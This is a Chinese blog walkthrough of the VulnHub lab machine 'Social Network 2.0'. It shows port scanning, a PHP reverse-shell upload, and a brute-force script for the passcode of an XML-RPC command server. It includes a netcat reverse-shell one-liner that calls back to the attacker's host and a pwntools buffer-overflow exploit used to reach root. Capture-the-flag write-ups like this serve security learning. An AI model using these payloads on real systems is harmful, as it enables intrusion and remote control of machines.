social network 2.0

最新推荐文章于 2024-07-23 15:12:20 发布
最新推荐文章于 2024-07-23 15:12:20 发布
阅读量419 收藏 7
点赞数 7
文章标签: 网络安全 web安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yutianovo/article/details/136606152
版权

下载地址

https://www.vulnhub.com/entry/boredhackerblog-social-network-20,455/

信息搜集

nmap

nmap 192.168.31.251 -p-

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8000/tcp open  http-alt

80

8000

在网页中注册一个账号

在此处上传一个以 php 结尾的文件用于反弹shell

文件位置为 /usr/share/webshells/php/php-reverse-shell.php

得到上传的路径

www-data

在 kali 开启监听

访问 9.php 得到 shell

传输文件到 kali

socent

monitor.py 移动至 socent

#my remote server management API
import SimpleXMLRPCServer
import subprocess
import random

debugging_pass = random.randint(1000,9999)

def runcmd(cmd):
    results = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    output = results.stdout.read() + results.stderr.read()
    return output

def cpu():
    return runcmd("cat /proc/cpuinfo")

def mem():
    return runcmd("free -m")

def disk():
    return runcmd("df -h")

def net():
    return runcmd("ip a")

def secure_cmd(cmd,passcode):
    if passcode==debugging_pass:
         return runcmd(cmd)
    else:
        return "Wrong passcode."

server = SimpleXMLRPCServer.SimpleXMLRPCServer(("0.0.0.0", 8000))
server.register_function(cpu)
server.register_function(mem)
server.register_function(disk)
server.register_function(net)
server.register_function(secure_cmd)

server.serve_forever()

根据以上服务端脚本内容,写出对服务端交互的脚本

➜  hard_socnet2 cat client.py 
from cgitb import reset
import re
from xmlrpclib import ServerProxy


s = ServerProxy("http://192.168.31.251:8000/")
result = s.net()
print(result)%                                                                                                           ➜  hard_socnet2 python2 client.py
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:61:30:92 brd ff:ff:ff:ff:ff:ff
    inet 192.168.31.251/24 brd 192.168.31.255 scope global dynamic ens33
       valid_lft 42834sec preferred_lft 42834sec
    inet6 fe80::20c:29ff:fe61:3092/64 scope link 
       valid_lft forever preferred_lft forever

测试发送数据成功

此时并不能任意执行命令,需要暴力破解随机数

from cgitb import reset
import re
from xmlrpclib import ServerProxy


for i in range(2000, 9999):
    s = ServerProxy("http://192.168.31.251:8000/")
    # result = s.secure_cmd("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.31.134 5124 >/tmp/f", i)
    result = s.secure_cmd("whoami", i)
    if "Wrong passcode." in result:
        pass
    else:
        print(result)
        print(i)
        break

得到结果

from cgitb import reset
import re
from xmlrpclib import ServerProxy

s = ServerProxy("http://192.168.31.251:8000/")
i = 3635
result = s.secure_cmd("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.31.134 5124 >/tmp/f", i)

得到 shell

add_record 调试

经过模糊测试

当第三次运行且第三问为 1 时

在第四问输出超长的数据会导致缓冲区溢出

ida 反编译

后门函数 地址

在 ubuntu 中调试,写脚本测试成功

exp

from pwn import *
context.log_level = 'debug'

io = process("./add_record")

payload = b'A' * 58 + b'B' * 4 + p32(0x08048676)

io.recvline()
io.send(b"test\n")
io.recvline()
io.sendline("1")
io.sendline("1443")
io.send(b"1\n")
io.sendline(payload)
io.interactive()

靶机中

python -c "import struct; print('test\n11\n11\n1\n' + 'A'*62 + struct.pack('I', 0x08048676))" > payload
cat payload - | ./add_record

ROOT

赛博雨天
关注
  • 7
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
VnlnHub BOREDHACKERBLOG SOCIAL NETWORK 2.0
weixin_45682839的博客
09-06 563
Vnlnhub BOREDHACKERBLOG SOCIAL NETWORK 2.0靶机过关攻略记录,设计知识包括:端口服务探测、sql注入、文件上传漏洞、linux本地提权、密码爆破、漏洞利用(python XMLRPC服务)、利用代码编写、gdb程序调试、缓冲区溢出漏洞利用等
(vulhub靶机通关)BoredHackerBlog: Social Network 2.0---hard_socnet2
yang1234567898的博客
01-07 3536
靶机下载地址:BoredHackerBlog: Social Network 2.0 ~ VulnHub 最终只拿到了本地权限,root权限的提升涉及逆向工程、缓冲区溢出的源码审计,还在摸索 首先,必须保证靶机、kali是通过桥接模式在同一网段 主机发现: 打开kali,通过ifconfig查看主机网段 nmap扫描网段: nmap 192.168.43.0/24 找到靶机ip,开放了22、80、8000端口 获取webshell: 先访问80端口,是
Social Network Visualizer:社交网络分析和可视化软件-开源
04-29
请访问我们的新网站:http://socnetv.org Social Network Visualizer(SocNetV)是一种社交网络分析和可视化应用程序。 您可以绘制社交网络(图形/图)或加载现有的社交网络(GraphML,UCINET,Pajek等),计算凝聚力,中心性,社区和结构等效性指标,并基于演员中心性或声望得分应用各种布局算法(即特征向量,介于两者之间)或在动态模型上(例如,Kamada-Kawai弹簧嵌入器)
如何用 R 绘制交互式社会网络图?
玉树芝兰
03-25 4527
挖掘社会关系网络,助你洞若观火。需求最近有个学生问我,如何绘制交互式社会网络图(Interactive Social Network Graph)?之所以一定要交互式,是...
Social Network Visualizer社交网络可视化,导入txt数据集
裕东方的博客
10-31 3618
前言 研一选了门《社交网络分析》课,要求用一种SNA工具实现一个数据集的分析。这里介绍一下Social Network Visualizer的基本使用方法Social Network Visualizer(SocNetV)是一种灵活且用户友好的工具,用于分析和可视化社交网络。它使用户可以在虚拟画布上单击几下来构建社交网络图,加载各种格式的网络(GraphViz,GraphML,Adjacency,Pajek,UCINET等),或通过爬网网页中的所有链接来创建网络。该应用程序可以计算网络的基本属.
social-network-2.0
03-20
Create React App入门 该项目是通过引导的。 可用脚本 在项目目录中,可以运行: yarn start 在开发模式下运行应用程序。打开在浏览器中查看它。 如果您进行编辑,则页面将重新加载。您还将在控制台中看到任何棉绒...
social-network-ver2.0
04-01
Create React App入门 该项目是通过引导的。 可用脚本 在项目目录中,可以运行: npm start 在开发模式下运行应用程序。 打开在浏览器中查看它。 如果您进行编辑,则页面将重新加载。 您还将在控制台中看到任何...
SocialNetwork:Laravel和Vue.JS支持的社交网络
05-03
安装git clone https://github.com/andreas83/SocialNetwork.gitcd SocialNetworkcomposer installnpm install1.2配置检查.env.example文件中的数据库设置1.3数据库这将创建数据库结构php artisan migrate1.3文件夹/...
social_network_project
03-13
在“Social Network Project”中,我们探讨的是一个与社交网络相关的软件开发项目。这个项目可能涉及到构建一个在线社交平台,让用户能够创建个人资料、连接朋友、分享内容、参与讨论等。下面将详细介绍在这个项目中...
resn - REdis Social Network-开源
07-19
作为一个开源项目,`resn`遵循特定的开源许可协议,如MIT或Apache 2.0,鼓励开发者自由使用、修改和分发代码。社区的支持使得`resn`能够不断迭代改进,开发者可以通过参与贡献来优化和扩展库的功能。 总的来说,`...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8343
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
“微软蓝屏”事件暴露网络安全哪些问题
sheji888的专栏
07-23 247
微软蓝屏”事件是指2024年7月19日发生的一起全球性技术故障,主要涉及微软视窗(Windows)操作系统及其相关应用和服务。
“微软蓝屏”事件暴露了网络安全哪些问题?
最新发布
Envyᥫᩣ的博客
07-23 230
首先,不同行业之间应该建立更加紧密的联系和合作机制,共同分享信息和经验,提高网络安全防范能力。其次,政府和企业应该加强对网络安全的投资和支持,推动网络安全技术的创新和发展。最后,政府和企业应该加强对软件更新的监管和管理,建立更加完善的法律法规和标准,以确保软件更新的安全和可靠性。那么,如何提高系统的韧性和应急响应能力呢?首先,企业应该建立完善的应急预案和应急响应机制,包括备份系统、故障诊断和修复等步骤,以快速应对系统故障。最后,企业应该加强员工的安全意识和培训,提高员工的应急响应能力和自我保护意识。
如何保护你的网络安全
m0_70655343的博客
07-15 907
这项服务可以抵御复杂的网络威胁,即使在最强烈的攻击下也能保证您的网站服务如常,用户几乎无感知。此外,DDoS高防服务还具备网络应用程序防火墙(WAF),采用实时监控和机器学习来保护用户的资料,防止用户资料被盗,保护服务免遭未经授权的访问,降低个人数据泄露的风险,进而防止数字资产流失。为什么它这么重要呢?打个比方,这就像是你家车库的门开关出了问题,每次你按下按钮,车库门就不停地开关,直到电池耗尽。想象一下,你家的路由器被人利用来发起攻击,就像是你家的水龙头被打开,水不停地流向别人的房子,淹没了他们的院子。
网络安全相关竞赛比赛
黑战士的博客
07-18 707
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
“微软蓝屏”事件:网络安全与系统稳定性的深刻反思
tian362的专栏
07-23 188
面对软件更新流程中的风险管理和质量控制问题、预防类似大规模故障的需求以及跨领域连锁反应的行业影响,我们需要从多个方面入手,加强风险识别与评估、完善测试流程、实施严格的质量控制措施、设计冗余系统、实施灾难恢复计划、建立高可用架构、利用自动化工具和监控系统以及加强跨行业合作等。通过部署多个相互独立的系统组件,可以在某个组件发生故障时,由其他组件接管其工作,从而确保系统整体的连续性和稳定性。在“微软蓝屏”事件中,微软的视窗系统作为众多行业信息系统的基石,其故障迅速波及到了多个领域,造成了广泛的影响。
标题:微软蓝屏事件:网络安全的警钟与反思
chezabo6116的博客
07-23 199
标题:微软蓝屏事件:网络安全的警钟与反思 近日,微软视窗系统软件更新引发的“微软蓝屏”事件,不仅在全球范围内引发了广泛关注,也对全球IT基础设施的韧性与安全性提出了严峻挑战。这次事件暴露了网络安全和系统稳定性方面的诸多问题。本文将从软件更新流程中的风险管理、预防大规模故障的最佳方案、以及跨领域连锁反应的行业影响三个方面,探讨如何构建更加稳固和安全的网络环境。 方向一:软件更新流程中的风险管理和质量控制机制 软件更新是系统维护的重要环节,但不当的更新流程可能会引入新的风险。此次“微软蓝屏”事件就是一个典型案例
social network
03-14
社交网络是指通过互联网连接人与人之间的关系和交流的平台。它允许用户创建个人资料、分享信息、发布动态、添加好友、加入群组等,以便与其他用户进行互动和交流。 社交网络的主要功能包括: 1. 个人资料:用户可以在社交网络上创建自己的个人资料,包括姓名、照片、兴趣爱好等信息,以展示自己的身份和特点。 2. 好友关系:用户可以在社交网络上添加其他用户为好友,以便跟踪他们的动态、分享信息和进行私聊。 3. 动态发布:用户可以在社交网络上发布文字、图片、视频等动态,与好友分享自己的生活、观点和经验。 4. 社交群组:用户可以加入各种兴趣群组,与志同道合的人一起讨论话题、分享资源和建立联系。 5. 私信聊天:用户可以通过社交网络与好友进行一对一的私聊,方便快捷地进行交流和沟通。 6. 活动和事件:社交网络也提供了活动和事件的功能,用户可以创建、参加和邀请好友参加各种线上或线下的活动。 社交网络的优势在于它能够打破地域限制,让人们可以方便地与世界各地的人进行交流和互动。它也为个人、企业和组织提供了一个广泛的宣传和推广平台。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值